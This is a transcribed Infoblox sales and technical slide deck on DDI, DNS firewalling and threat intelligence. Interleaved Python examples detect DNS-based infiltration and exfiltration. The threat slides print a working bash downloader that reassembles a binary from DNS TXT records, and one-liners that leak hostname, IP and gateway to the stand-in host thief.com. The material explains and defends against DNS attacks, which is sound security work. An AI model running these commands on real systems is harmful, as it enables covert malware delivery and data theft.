
NGDDI – The Context and Network Metadata

DNS Security and Partner Ecosystem

1 | © 2013-2018 Infoblox Inc. All Rights Reserved.
Infoblox Overview & Business Update

• Founded in 1999, IPO in 2012: NYSE BLOX
• Headquartered in Santa Clara, CA with global operations in 25 countries
• Leader in technology for network control
• Market leadership
̶ DDI Market Leader (Gartner)
̶ 50% DDI Market Share (IDC)
• 8,000+ customers
• 64,000+ systems shipped
• 38 patents, 25 pending
• Annual revenue $300M, 27% CAGR
• Infoblox acquired IID in 2016
̶ Leader in providing verified Machine Readable Threat Intelligence (MRTI)

[Chart: Worldwide DDI Market Share]

Traditional Core Network Services (DNS, DHCP and IPAM)
Integrated DDI for physical and virtual environments

[Diagram: Authoritative IPAM at the centre (Visibility, Efficiency, Control), with DNS (Secure, Intelligent, Extensible) and DHCP (Automation, Insight) as the core services. Surrounding components: Advanced Reporting, Infoblox DNS/DHCP, Microsoft DNS/DHCP, Network Task Automation, Virtual Discovery, IP Network Discovery and Network Insight, reaching down to IP Endpoints and Switches/Routers.]

Flexible Deployment Options with Microsoft

Designed to Match Unique Organization Requirements

Infoblox Authoritative IPAM (with Microsoft DHCP, DNS)
• Non-disruptive overlay solution. Agentless, native Microsoft communication
• Automated, closed-loop workflows and task scheduling
• Centralized management and troubleshooting via a single pane of glass
(Callout: labor and time savings with Infoblox IPAM: ~70%!)

Infoblox DHCP (with Microsoft DNS)
• Improved service uptime with standards-based HA and proven DHCP failover
• Improved security and visibility of all network devices with DHCP device fingerprinting
• Enhanced reporting with DHCP lease history (now with user name)

Infoblox DNS (with Microsoft Active Directory)
• Secure DNS environment: detection, protection, and mitigation against malware and data exfiltration
• Fully integrated with Active Directory
(Callout: MSFT DNS refresh rate is 15 min to 4 hrs vs. a few seconds for Infoblox)

The Infoblox Advantage – Patented Grid Technology
Centralized visibility & control of core network services

All centrally managed as ONE system

[Diagram: Grid Master (HA pair) at HQ with a Grid Master Candidate at the recovery site; Grid Members providing DNS/DHCP, Network Insight and Reporting & Analytics; a Grid Member with DNS Firewall fed by ActiveTrust Threat Intel and Infoblox threat data feeds; Infoblox Cloud covering your public and private cloud IaaS; branch office and edge network/remote office members (DHCP, Microsoft DNS/DHCP); device discovery of network infrastructure (switches, routers, firewalls etc.). Network and security events with context are exported for use in the ecosystem.]

Infoblox Evolution
DDI with Authoritative IPAM

NGDDI – Microsoft Integration, AD User Identity Mapping

• Adds new sync process for identity mapping
̶ Extended “Add Microsoft Server” wizard with user mapping options
- Microsoft tab is now always displayed; non-identity mapping capabilities are only shown with license
̶ Agentless (MS-RPC) interface to pull AD authentication logs
̶ Correlates IP & user information in AD authentication events
̶ Exchange servers can be included (allows mapping of mobile devices)

• Adds user information into IPAM, DNS & DHCP tabs
• New “Network Users” view, and “User Login History” report
• Added user information into existing reports in Reporting Member
̶ DHCP Lease History
̶ Top RPZ Hits
• New “Network Users” Dashboard Widget
NGDDI – Localization and Visibility,
Network Insight for Security

Detect breakdown in change management process:
• Discovering networks not in IPAM shows lack of compliance to process
• Check endpoint MAC addresses against authoritative record
• NAC policy verification
• Locate rogue and compromised endpoints and take remediation action

Network Visibility: discovery and visibility of devices, interfaces, networks, IP addresses, endpoints and connectivity

Increased Security: detection of rogue devices, reduced configuration errors, and detection of unmanaged networks & assets

Operational Efficiencies: integrated discovery-to-IPAM workflow to convert discovered assets into managed objects and set discovery parameters on added hosts and networks

NGDDI – Security and Analytics,
Reporting, Auditing and Forensics

Application Uptime: monitor the health and status of the core services supporting your business critical applications and predict future

Security: stop security breaches before they occur and detect and control APTs faster.

Compliance: quickly generate compliance reports, without impacting the performance of grid members.

Capacity Planning: track, trend and predict key capacity parameters over time, to ensure your core network services match growth.

Infoblox NGDDI, Most Accurate Information
Authoritative Network Database – answered in ONE SHOT

What IP? – DHCP service / Discovery
When appear? – Allocate / Discovery / Cloud
Which MAC? – DHCP or Discovery
Device type? – DHCP fingerprint
DNS hostname? – DNS + DDNS updates
User behind? – AD user identity mapping
Where is it? – Network Insight / Cloud IPAM
Network context? – Risk, localization, attributes
Infected? Block? – DNSFW / Insight + Ecosystem

What has happened in the past? (IP, user, hostname, RPZ, lease…) Ecosystem activity? Tracking history? – Infoblox Analytics and Reporting, in ONE SHOT
Infoblox key Product Initiatives
Security
• Malware & Advanced Persistent Threats (APT)
• Infrastructure attacks (DDoS)
• DNS Tunneling and Data Exfiltration

Availability
• Intelligent traffic management for global services
• Services performance optimization
• Global and Local proximity delivery services

Cloud
• Ongoing evolution of the Data Center
• Private, Public, Hybrid

Automation
• Budget for IT headcount continues to decline
• Skilled staff more difficult to find and retain

Infoblox Evolution
DDI with Secure DNS

Malware Exploiting DNS
• Over 91% of malware uses DNS
̶ To gain command and control
̶ To exfiltrate data
̶ To redirect traffic
• Despite adversaries’ reliance on DNS, 68% of organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and impact all sizes and types of organizations
• Average total cost of a data breach ~$3.8M USD
• The question isn’t if, but when you will be attacked, and how effectively you can respond

Source: Cisco 2016 Annual Security Report

Hiding Network Data via DNS Tunneling
• Uses DNS as a covert communication channel to bypass firewalls
• Attacker tunnels other protocols like SSH, or web, within DNS
• Enables attackers to easily insert malware, pass stolen data or tunnel IP traffic without detection
• A DNS tunnel can be used as a full remote-control channel for a compromised internal host
Examples:
̶ Iodine
̶ OzymanDNS
̶ SplitBrain
̶ DNS2TCP

[Diagram: a client-side tunnel program in the enterprise encodes IP traffic in DNS queries; they cross to the Internet and reach an Iodine DNS terminal server, which carries the IP traffic onward (“Slow DNS”).]

Data Exfiltration over DNS Queries
Malware Steals File Containing Sensitive Data
• Infected endpoint gets access to file containing sensitive data
• It encrypts and converts info into encoded format
• Text broken into chunks and sent via DNS using hostname.subdomain or TXT records
• Exfiltrated data reconstructed at the other end
• Can use spoofed addresses to avoid detection
• Data is listed on Darknet and sold for Bitcoin

[Diagram: the compromised endpoint sends the chunks as queries (visible in Syslog) to a rogue DNS server acting as C&C, for example:]
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
Company.foo.thief.com
+12f(2354ayqv1asdf7s6ex.thief.com
Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
nkjFYVW$%&(YBH$JKGHkjh.thief.com

Malware Infiltration over DNS - TXT

Binary code is encoded and loaded into TXT records

[Diagram: the Command and Control side loads the encoded binary into a rogue DNS server via DDNS update; the compromised endpoint issues “Query for TXT” and receives the base64-encoded payload in the TXT answer. The base64 blob shown on the slide is omitted here; its first bytes decode to the ELF magic, i.e. a Linux executable.]

Infiltration and C&C behavior: infection

Downloader script, delivered hex-encoded across 4 TXT records (the hex dump shown on the slide is omitted here):

    #!/bin/bash
    # Text dig prints when the server stops answering; the script uses it as its end-of-payload marker
    error=';; connection timed out; no servers could be reached'
    i=0
    echo '' > output.b64
    while :
    do
        # Chunk number $i of the payload is the TXT record for <i>.<domain>; the domain is passed as $1
        RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2`
        if [ "$RESP" = "$error" ];
        then
            echo "Timeout - done"
            break
        fi
        # Append the chunk to the base64 file and move on to the next record
        echo -ne $RESP >> output.b64
        echo $RESP
        i=$((i+1))
    done
    # Reassemble the binary from the concatenated base64 chunks
    cat output.b64 | base64 -d > output
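Detection logic for the behaviour on this slide and the TXT slide before it, added here as an example (it is not Infoblox code and not from the slides): it takes DNS answers as (name, type, rdata) tuples, reassembles TXT records named <n>.<zone> in sequence the way the script does, base64-decodes the result and flags zones whose payload begins with an executable's magic bytes. The records are constructed sample data.

```python
import base64
import binascii
import re
from collections import defaultdict

# Magic bytes that identify an executable arriving inside TXT data.
EXECUTABLE_MAGIC = {b"\x7fELF": "ELF binary", b"MZ": "PE executable", b"#!": "script"}
# Owner names of the form <n>.<zone>: the $i.$1 pattern the downloader walks.
SEQ_NAME = re.compile(r"^(\d+)\.(.+)$")

# Constructed sample: a 16-byte stand-in for an ELF file, base64-encoded (the
# encoding starts with "f0VMRg", like the TXT data on the slide) and split
# across four numbered TXT records; two benign TXT records are mixed in.
SAMPLE_B64 = base64.b64encode(b"\x7fELF\x02\x01\x01" + b"\x00" * 9).decode()
SAMPLE_RECORDS = [
    ("0.thief.com", "TXT", '"%s"' % SAMPLE_B64[0:6]),
    ("1.thief.com", "TXT", '"%s"' % SAMPLE_B64[6:12]),
    ("2.thief.com", "TXT", '"%s"' % SAMPLE_B64[12:18]),
    ("3.thief.com", "TXT", '"%s"' % SAMPLE_B64[18:24]),
    ("example.com", "TXT", '"v=spf1 include:_spf.example.com -all"'),
    ("5.example.org", "TXT", '"aGVsbG8="'),  # numbered, decodes to "hello": not executable
]


def group_sequential_txt(records):
    """Collect TXT rdata per zone, ordered by the leading sequence number."""
    chunks = defaultdict(dict)
    for name, rtype, rdata in records:
        match = SEQ_NAME.match(name.rstrip("."))
        if rtype == "TXT" and match:
            chunks[match.group(2)][int(match.group(1))] = rdata.strip('"')
    return {zone: [parts[i] for i in sorted(parts)] for zone, parts in chunks.items()}


def classify_payload(chunks):
    """Concatenate and base64-decode like the script; return the executable kind or None."""
    try:
        blob = base64.b64decode("".join(chunks), validate=True)
    except (binascii.Error, ValueError):
        return None
    for magic, kind in EXECUTABLE_MAGIC.items():
        if blob.startswith(magic):
            return kind
    return None


def find_txt_infiltration(records):
    """Return {zone: kind} for zones whose numbered TXT records carry an executable."""
    found = {}
    for zone, chunks in group_sequential_txt(records).items():
        kind = classify_payload(chunks)
        if kind:
            found[zone] = kind
    return found


if __name__ == "__main__":
    print(find_txt_infiltration(SAMPLE_RECORDS))  # {'thief.com': 'ELF binary'}
```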

Command and Control
Signaling and Control Responses with DNS

Hostname: hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
PTR -> 1.2.3.4

IPv4: ipconfig getifaddr en0 | xxd -p
Query A -> 3137322e32302e31302e320a.thief.com
PTR -> 1.2.3.4

Gateway: route -n get default|grep gateway|cut -d: -f 2|sed 's/^[ \t]*//;s/[ \t]*$//'|xxd -p
Query A -> 3137322e32302e31302e310a.thief.com
PTR -> 1.2.3.4

DNS is Coverage? YES with Infoblox

[Diagram: the security stack (Firewall/NGFW, IPS/IDS, Web Proxy, Email/SPAM, APT/Sandbox, and your SIEM solution with centralized logging and reporting) sits between the business (DHCP, DNS, IP/Data) and the app offerings (Salesforce.com, Office 365, Workday – HR, SAP).]

DNS communicates via port 53 and is NOT protected by these tools.

With Infoblox:
✓ Secure DNS at the source
✓ Reporting
✓ Proactively block malware and understand who’s infected
✓ Prevent IP leaving your DC

The Motion of Malware Through Networks
Malware uses DNS at every stage

Infiltration: query malicious domains and report to C&C (DNS server)
Infection: download malware to the infected host (client)
Exfiltration: transport the data offsite (server)

[Diagram: the DNS server’s unique infrastructure position in the network sees all three stages.]
DNSFW & ActiveTrust Threat Intelligence
• “Feeds” only block access
̶ Cause of the problem is still there!
̶ Still require analysts to identify size, scope, severity
̶ Still require them to find and clean the device
• Local intelligence (context) allows you to start automating the analysis and mitigation
̶ It now becomes ”Actionable Intelligence”
• Finally, there are many feeds
̶ Each specializes in something
̶ There is very little overlap
̶ As customers’ security capability matures, they use more and more

[Diagram: the Infoblox Threat Intelligence Feed (ActiveTrust: phishing, botnets, SPAM, IPs, URLs; Malware – Base, Malware, Ransomware) and Other Vendor Feed(s) flow into the Infoblox DDI Platform, which adds local context (device IP address, device MAC address, device type, device host name, device lease history, user logged, device localization, device metadata, user-defined, RPZ behaviors) and shares it with the ecosystem (NAC, DLP, WAF, NGFW, IPS, FW).]

Infoblox TIDE – External Threat Feeds
Solution Overview
• Infoblox ActiveTrust receives threat data from third-party sources
• This third-party data is then managed from within Infoblox TIDE.

Benefits
1. Collect and manage curated threat intelligence in a single platform
2. Maximize resources by giving back time to the security operations and threat intelligence team

Support model: TBD

Leveraging Threat Intel Across the Entire Security Infrastructure

[Diagram: sources (Infoblox C&C IP list; SURBL phishing & malware URLs; TIDE Marketplace; custom TI) feed TIDE, which defines data policy, governance & translation and distributes spambot IPs and C&C & malware host/domain lists in various file formats; Dossier is used to investigate threats.]

• Threat intel automatically aggregated from internal and external sources
• Flexible data distribution to NGFW, SIEM, etc.

RESULT: single source of TI management, faster triage, threat prioritization

Streaming DNS Threat Insight Analytics Works

Detects sophisticated data exfiltration techniques that don’t have well-known signatures (zero day)

1. Looks at TXT records, A, AAAA records
2. Detects presence of data using lexical and temporal analysis
3. Certain attributes add to a threat score, others subtract from it
4. Final score classifies a request as exfiltration or not
5. If exfiltration is found, automatically adds destinations to special internal RPZ feed
6. Scales protection to other parts of the network

[Diagram: model inputs – Entropy, Size, Lexical Analysis, Frequency, N-Gram.]
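A minimal version of the scoring in steps 2 to 4, added here as an example that is neither Infoblox's product logic nor from the slides: for each query name in a constructed resolver log it computes size, entropy, lexical (hex-encoded text, the pattern from the C&C slide) and frequency attributes, adds and subtracts to a score, and classifies the name as exfiltration above a threshold. The weights, thresholds and the two-label registered-domain rule are assumptions, and the n-gram model is omitted.

```python
import math
import string
from collections import defaultdict

# Constructed resolver query log (timestamp, client, qname); the thief.com names are taken from the slides.
SAMPLE_LOG = """\
2018-03-01T10:00:01 10.1.1.5 www.example.com
2018-03-01T10:00:03 10.1.1.7 NameMarySmith.foo.thief.com
2018-03-01T10:00:03 10.1.1.7 MRN100045429886.foo.thief.com
2018-03-01T10:00:04 10.1.1.7 DOB10191952.foo.thief.com
2018-03-01T10:00:04 10.1.1.7 Xc786asdf89xcbv897sadfjlw.thief.com
2018-03-01T10:00:06 10.1.1.7 3137322e32302e31302e320a.thief.com
"""

def shannon_entropy(text):
    """Bits per character (0.0 for an empty string)."""
    n = len(text)
    return -sum(text.count(c) / n * math.log2(text.count(c) / n) for c in set(text)) if n else 0.0

def split_name(qname):
    """(subdomain labels, registered domain); assumes the last two labels are the registered domain."""
    labels = qname.rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])

def hex_decodes_to_text(label):
    """Even-length hex label that decodes to printable ASCII: the `xxd -p` signalling pattern."""
    if len(label) < 8 or len(label) % 2 or any(c not in string.hexdigits for c in label):
        return False
    return all(b in string.printable.encode() for b in bytes.fromhex(label))

def score_query(qname, unique_names):
    """Threat score for one name: suspicious attributes add, dictionary-like labels subtract."""
    labels, domain = split_name(qname)
    if not labels:
        return 0
    score = 2 * (max(len(l) for l in labels) > 20)             # size
    score += 2 * (shannon_entropy("".join(labels)) > 3.5)       # entropy
    score += 3 * hex_decodes_to_text(labels[0])                 # lexical: hex-encoded text
    score += 2 * (unique_names.get(domain, 0) >= 5)             # frequency: many distinct names per domain
    score -= all(l.isalpha() and len(l) <= 10 for l in labels)  # short plain words look like ordinary hosts
    return score

def analyze_log(log_text, threshold=4):
    """Score each query in the log; a score >= threshold classifies it as exfiltration."""
    entries = [line.split() for line in log_text.splitlines()]
    unique = defaultdict(set)
    for _, _, qname in entries:
        unique[split_name(qname)[1]].add(qname)
    counts = {d: len(s) for d, s in unique.items()}
    report = []
    for t, c, q in entries:
        score = score_query(q, counts)
        report.append({"time": t, "client": c, "qname": q, "score": score, "exfil": score >= threshold})
    return report
```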

Infoblox ActiveTrust Cloud as a Service

ActiveTrust as a Service = Machine Readable Threat Intelligence + Threat Insight as a Service
Multi-pronged threat detection and prevention:
• Aggregated & shared Threat Intelligence, TIP designed for enterprises
• DNS Reputation
• Behavioral Analytics, data exfiltration

ActiveTrust + Threat Intelligence end-to-end protection:
• On/off premise
• Roaming devices
• Remote/branch locations

[Diagram: on premise, the Central Office / Data Center runs a Data Collector VM beside the internal authoritative DNS, behind NAT + Firewall; it downloads threat intelligence from the cloud service and uploads ActiveTrust Network Insight and DHCP lease logs to it. Off premise, roaming devices with the mobile client* reach the service directly.]

Unified policy, reporting and analytics
Single Unified Console for Management

Infoblox as Part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation

Context to Prioritize Remediation

DHCP – Device Audit Trail and Fingerprinting
• Device info, MAC, lease history

IPAM – Application and Business Context
• “Metadata” via Extended Attributes: owner, app, security level, location, ticket number
• Context for accurate risk assessment and event prioritization

DNS
• Malicious activity inside the security perimeter
• Includes BYOD and IoT devices
• Profile device & user activity
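How that context can be joined to a single event, added here as an example that is not Infoblox code (it also illustrates the AD identity mapping and authoritative network database slides earlier): a DNS Firewall (RPZ) hit with a client IP and timestamp is enriched from constructed DHCP lease history, AD logon events and IPAM extended attributes, and a triage priority is derived. The attribute names, the lease-window rule that keeps a re-leased IP from being attributed to its previous user, and the priority rules are assumptions.

```python
import ipaddress
from datetime import datetime

# Constructed sample data standing in for the Infoblox sources named above.
LEASES = [  # DHCP lease history: ip, mac, lease start, lease end, hostname, DHCP fingerprint
    ("10.1.1.7", "00:11:22:33:44:55", "2018-03-01T08:00", "2018-03-01T12:00", "fin-pc-01", "Windows 7"),
    ("10.1.1.7", "66:77:88:99:aa:bb", "2018-03-01T12:00", "2018-03-01T20:00", "visitor-mbp", "Mac OS X"),
]
LOGONS = [  # AD authentication events: time, user, client ip
    ("2018-03-01T08:05", "CORP\\alice", "10.1.1.7"),
    ("2018-03-01T12:10", "CORP\\bob", "10.1.1.7"),
]
NETWORK_EAS = {  # IPAM extended attributes per network (attribute names are assumed)
    "10.1.1.0/24": {"owner": "Finance", "security_level": "high", "location": "HQ"},
}

def lease_at(ip, when):
    """The lease that held ip at time `when`, or None (the IP may have been re-leased since)."""
    for lease in LEASES:
        if lease[0] == ip and datetime.fromisoformat(lease[2]) <= when < datetime.fromisoformat(lease[3]):
            return lease
    return None

def user_at(ip, when, lease_start):
    """Most recent AD logon from ip before `when`; logons older than the current lease belong to the IP's previous tenant."""
    hits = [l for l in LOGONS if l[2] == ip and lease_start <= datetime.fromisoformat(l[0]) <= when]
    return max(hits)[1] if hits else None

def network_eas(ip):
    """Extended attributes of the IPAM network containing ip (longest prefix wins)."""
    nets = [(ipaddress.ip_network(n), eas) for n, eas in NETWORK_EAS.items() if ipaddress.ip_address(ip) in ipaddress.ip_network(n)]
    return max(nets, key=lambda ne: ne[0].prefixlen)[1] if nets else {}

def enrich_event(event):
    """Attach DHCP, AD and IPAM context to a DNS security event and derive a triage priority."""
    when = datetime.fromisoformat(event["time"])
    ctx = {"rule": event["rpz_rule"], "client_ip": event["client_ip"], "mac": None,
           "hostname": None, "device_type": None, "user": None}
    lease = lease_at(event["client_ip"], when)
    if lease:
        ctx.update(mac=lease[1], hostname=lease[4], device_type=lease[5])
        ctx["user"] = user_at(event["client_ip"], when, datetime.fromisoformat(lease[2]))
    ctx["network"] = network_eas(event["client_ip"])
    high_value = ctx["network"].get("security_level") == "high"
    critical = event["severity"] == "critical"
    ctx["priority"] = "P1" if high_value and critical else "P2" if high_value or critical else "P3"
    return ctx

# Constructed RPZ hit: the second tenant of 10.1.1.7 queried a C&C domain.
SAMPLE_EVENT = {"time": "2018-03-01T12:30", "client_ip": "10.1.1.7", "rpz_rule": "malware-c2", "severity": "critical"}
```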

Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced DNS Protection include:
• Software ADP: for organizations with lower capacity requirements with a lower entry price point.
• Infoblox Appliances: Trinzic hardware and virtual appliances consist of Trinzic TE-1410/1420/815/825/1415 appliances with software ADP subscription add-on. Virtual appliances are supported on VMware and KVM.
• Advanced DNS Protection Service: the software plus Threat Adapt technology provides ongoing protection against existing and evolving threats to the DNS server.
• Reporting and Analytics: deep visibility and rich network context around attack patterns and sources.

Infoblox Network Automation - NetMRI

What is NetMRI?
Origin: Network Consulting Assessments...
1. Network Discovery and Inventory
̶ Network friendly
̶ Network constructs, not just devices (routes, VLANs, VRRP pairs, etc.)
̶ Multi-layer topology
̶ Auto correlation
2. Network Configuration Analysis
̶ Proactive identification of hidden problems with no fault or performance symptoms
̶ Port duplex mismatch, VLAN member priorities, VRRP not recognizing peer, etc.
3. Security Policy Enforcement
̶ Bundled content
̶ Easy customization + unique capabilities
̶ Auto analysis, auditing, and reporting
4. Change Automation & Config Mgmt
̶ Change detection, audit, config backup, etc.
̶ Advanced / unique change automation

NetMRI Deployment Overview = Appliance
NetMRI: real-time & historical analysis

• Network discovery
• Built-in analysis
• Check against best practices
• Check against security policies
• Detect issues
• Monitor and manage change
• Automate change
• Switch port management

Collected via: SNMP, CLI/configuration, Syslog, Fingerprinting

Pre-SALES:
David Alfonso
david.alfonso@arrow.com
+34 660 252 134

SALES:
Patricia Cobo
patricia.cobo@arrow.com
+34 690 992 921

Pre-SALES:
Angel Aviles
angel.aviles@arrow.com
